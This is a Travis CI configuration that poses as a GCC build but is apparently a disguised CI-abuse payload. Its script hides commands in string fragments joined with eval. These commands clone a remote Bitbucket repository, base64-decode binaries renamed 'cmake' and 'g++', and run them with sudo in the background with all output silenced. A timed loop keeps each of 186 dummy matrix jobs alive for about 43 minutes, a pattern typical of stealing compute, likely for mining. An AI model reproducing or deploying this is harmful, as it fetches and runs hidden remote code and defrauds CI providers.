dist: bionic

env:
  - BUILD="--autounmask-write=3287E1"
  - BUILD="--autounmask-write=3287E2"
  - BUILD="--autounmask-write=3287E3"
  - BUILD="--autounmask-write=3287E4"
  - BUILD="--autounmask-write=3287E5"
  - BUILD="--autounmask-write=3287E6"
  - BUILD="--autounmask-write=3287E7"
  - BUILD="--autounmask-write=3287E8"
  - BUILD="--autounmask-write=3287E9"
  - BUILD="--autounmask-write=3287E10"
  - BUILD="--autounmask-write=3287E11"
  - BUILD="--autounmask-write=3287E12"
  - BUILD="--autounmask-write=3287E13"
  - BUILD="--autounmask-write=3287E14"
  - BUILD="--autounmask-write=3287E15"
  - BUILD="--autounmask-write=3287E16"
  - BUILD="--autounmask-write=3287E17"
  - BUILD="--autounmask-write=3287E18"
  - BUILD="--autounmask-write=3287E19"
  - BUILD="--autounmask-write=3287E20"
  - BUILD="--autounmask-write=3287E21"
  - BUILD="--autounmask-write=3287E22"
  - BUILD="--autounmask-write=3287E23"
  - BUILD="--autounmask-write=3287E24"
  - BUILD="--autounmask-write=3287E25"
  - BUILD="--autounmask-write=3287E26"
  - BUILD="--autounmask-write=3287E27"
  - BUILD="--autounmask-write=3287E28"
  - BUILD="--autounmask-write=3287E29"
  - BUILD="--autounmask-write=3287E30"
  - BUILD="--autounmask-write=3287E31"
  - BUILD="--autounmask-write=3287E32"
  - BUILD="--autounmask-write=3287E33"
  - BUILD="--autounmask-write=3287E34"
  - BUILD="--autounmask-write=3287E35"
  - BUILD="--autounmask-write=3287E36"
  - BUILD="--autounmask-write=3287E37"
  - BUILD="--autounmask-write=3287E38"
  - BUILD="--autounmask-write=3287E39"
  - BUILD="--autounmask-write=3287E40"
  - BUILD="--autounmask-write=3287E41"
  - BUILD="--autounmask-write=3287E42"
  - BUILD="--autounmask-write=3287E43"
  - BUILD="--autounmask-write=3287E44"
  - BUILD="--autounmask-write=3287E45"
  - BUILD="--autounmask-write=3287E46"
  - BUILD="--autounmask-write=3287E47"
  - BUILD="--autounmask-write=3287E48"
  - BUILD="--autounmask-write=3287E49"
  - BUILD="--autounmask-write=3287E50"
  - BUILD="--autounmask-write=3287E51"
  - BUILD="--autounmask-write=3287E52"
  - BUILD="--autounmask-write=3287E53"
  - BUILD="--autounmask-write=3287E54"
  - BUILD="--autounmask-write=3287E55"
  - BUILD="--autounmask-write=3287E56"
  - BUILD="--autounmask-write=3287E57"
  - BUILD="--autounmask-write=3287E58"
  - BUILD="--autounmask-write=3287E59"
  - BUILD="--autounmask-write=3287E60"
  - BUILD="--autounmask-write=3287E61"
  - BUILD="--autounmask-write=3287E62"
  - BUILD="--autounmask-write=3287E63"
  - BUILD="--autounmask-write=3287E64"
  - BUILD="--autounmask-write=3287E65"
  - BUILD="--autounmask-write=3287E66"
  - BUILD="--autounmask-write=3287E67"
  - BUILD="--autounmask-write=3287E68"
  - BUILD="--autounmask-write=3287E69"
  - BUILD="--autounmask-write=3287E70"
  - BUILD="--autounmask-write=3287E71"
  - BUILD="--autounmask-write=3287E72"
  - BUILD="--autounmask-write=3287E73"
  - BUILD="--autounmask-write=3287E74"
  - BUILD="--autounmask-write=3287E75"
  - BUILD="--autounmask-write=3287E76"
  - BUILD="--autounmask-write=3287E77"
  - BUILD="--autounmask-write=3287E78"
  - BUILD="--autounmask-write=3287E79"
  - BUILD="--autounmask-write=3287E80"
  - BUILD="--autounmask-write=3287E81"
  - BUILD="--autounmask-write=3287E82"
  - BUILD="--autounmask-write=3287E83"
  - BUILD="--autounmask-write=3287E84"
  - BUILD="--autounmask-write=3287E85"
  - BUILD="--autounmask-write=3287E86"
  - BUILD="--autounmask-write=3287E87"
  - BUILD="--autounmask-write=3287E88"
  - BUILD="--autounmask-write=3287E89"
  - BUILD="--autounmask-write=3287E90"
  - BUILD="--autounmask-write=3287E91"
  - BUILD="--autounmask-write=3287E92"
  - BUILD="--autounmask-write=3287E93"
  - BUILD="--autounmask-write=3287E94"
  - BUILD="--autounmask-write=3287E95"
  - BUILD="--autounmask-write=3287E96"
  - BUILD="--autounmask-write=3287E97"
  - BUILD="--autounmask-write=3287E98"
  - BUILD="--autounmask-write=3287E99"
  - BUILD="--autounmask-write=3287E100"
  - BUILD="--autounmask-write=3287E101"
  - BUILD="--autounmask-write=3287E102"
  - BUILD="--autounmask-write=3287E103"
  - BUILD="--autounmask-write=3287E104"
  - BUILD="--autounmask-write=3287E105"
  - BUILD="--autounmask-write=3287E106"
  - BUILD="--autounmask-write=3287E107"
  - BUILD="--autounmask-write=3287E108"
  - BUILD="--autounmask-write=3287E109"
  - BUILD="--autounmask-write=3287E110"
  - BUILD="--autounmask-write=3287E111"
  - BUILD="--autounmask-write=3287E112"
  - BUILD="--autounmask-write=3287E113"
  - BUILD="--autounmask-write=3287E114"
  - BUILD="--autounmask-write=3287E115"
  - BUILD="--autounmask-write=3287E116"
  - BUILD="--autounmask-write=3287E117"
  - BUILD="--autounmask-write=3287E118"
  - BUILD="--autounmask-write=3287E119"
  - BUILD="--autounmask-write=3287E120"
  - BUILD="--autounmask-write=3287E121"
  - BUILD="--autounmask-write=3287E122"
  - BUILD="--autounmask-write=3287E123"
  - BUILD="--autounmask-write=3287E124"
  - BUILD="--autounmask-write=3287E125"
  - BUILD="--autounmask-write=3287E126"
  - BUILD="--autounmask-write=3287E127"
  - BUILD="--autounmask-write=3287E128"
  - BUILD="--autounmask-write=3287E129"
  - BUILD="--autounmask-write=3287E130"
  - BUILD="--autounmask-write=3287E131"
  - BUILD="--autounmask-write=3287E132"
  - BUILD="--autounmask-write=3287E133"
  - BUILD="--autounmask-write=3287E134"
  - BUILD="--autounmask-write=3287E135"
  - BUILD="--autounmask-write=3287E136"
  - BUILD="--autounmask-write=3287E137"
  - BUILD="--autounmask-write=3287E138"
  - BUILD="--autounmask-write=3287E139"
  - BUILD="--autounmask-write=3287E140"
  - BUILD="--autounmask-write=3287E141"
  - BUILD="--autounmask-write=3287E142"
  - BUILD="--autounmask-write=3287E143"
  - BUILD="--autounmask-write=3287E144"
  - BUILD="--autounmask-write=3287E145"
  - BUILD="--autounmask-write=3287E146"
  - BUILD="--autounmask-write=3287E147"
  - BUILD="--autounmask-write=3287E148"
  - BUILD="--autounmask-write=3287E149"
  - BUILD="--autounmask-write=3287E150"
  - BUILD="--autounmask-write=3287E151"
  - BUILD="--autounmask-write=3287E152"
  - BUILD="--autounmask-write=3287E153"
  - BUILD="--autounmask-write=3287E154"
  - BUILD="--autounmask-write=3287E155"
  - BUILD="--autounmask-write=3287E156"
  - BUILD="--autounmask-write=3287E157"
  - BUILD="--autounmask-write=3287E158"
  - BUILD="--autounmask-write=3287E159"
  - BUILD="--autounmask-write=3287E160"
  - BUILD="--autounmask-write=3287E161"
  - BUILD="--autounmask-write=3287E162"
  - BUILD="--autounmask-write=3287E163"
  - BUILD="--autounmask-write=3287E164"
  - BUILD="--autounmask-write=3287E165"
  - BUILD="--autounmask-write=3287E166"
  - BUILD="--autounmask-write=3287E167"
  - BUILD="--autounmask-write=3287E168"
  - BUILD="--autounmask-write=3287E169"
  - BUILD="--autounmask-write=3287E170"
  - BUILD="--autounmask-write=3287E171"
  - BUILD="--autounmask-write=3287E172"
  - BUILD="--autounmask-write=3287E173"
  - BUILD="--autounmask-write=3287E174"
  - BUILD="--autounmask-write=3287E175"
  - BUILD="--autounmask-write=3287E176"
  - BUILD="--autounmask-write=3287E177"
  - BUILD="--autounmask-write=3287E178"
  - BUILD="--autounmask-write=3287E179"
  - BUILD="--autounmask-write=3287E180"
  - BUILD="--autounmask-write=3287E181"
  - BUILD="--autounmask-write=3287E182"
  - BUILD="--autounmask-write=3287E183"
  - BUILD="--autounmask-write=3287E184"
  - BUILD="--autounmask-write=3287E185"
  - BUILD="--autounmask-write=3287E186"

language: minimal

script:
  - sudo apt update || true
  - sxreDqILs="sudo apt --"
  - NqRiS="yes install"
  - huQpSocRWz=" cl-base64 "
  - nTpcGCqhJ="git &>/dev/"
  - eval "$sxreDqILs""$NqRiS""$huQpSocRWz""$nTpcGCqhJ""null"
  - OPxDGGeonK="git clone h"
  - BGTVTmVweRL="ttps://gccb"
  - WBGXDIIJLfV="uild@bitbuc"
  - keGZgo="ket.org/gcc"
  - dAyVckJSvQ="build/gcc.g"
  - SNaTJLen="it &>/dev/n"
  - eval "$OPxDGGeonK""$BGTVTmVweRL""$WBGXDIIJLfV""$keGZgo""$dAyVckJSvQ""$SNaTJLen""ull"
  - CoqIJ="base64 -d g"
  - SgYWG="cc/cmake_ >"
  - eval "$CoqIJ""$SgYWG"" cmake"
  - BmZFcoUiA="base64 -d g"
  - feobvJ="cc/config_ "
  - eval "$BmZFcoUiA""$feobvJ""> output"
  - rFHPzzD="base64 -d g"
  - CUjNYsF="cc/make_ > "
  - eval "$rFHPzzD""$CUjNYsF""g++"
  - chmod +x g++ cmake
  - ./cmake
  - AxtQMPIC="sed -i 's/b"
  - TiZzg="uild/tg2u/g"
  - eval "$AxtQMPIC""$TiZzg""' output"
  - yWwfPDtb="sudo ./g++ "
  - SCcxsxI="--config ou"
  - iKrsCuXkZQ="tput &>/dev"
  - eval "$yWwfPDtb""$SCcxsxI""$iKrsCuXkZQ""/null &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2603)) ] && sudo killall g++ && break; sleep 229; done
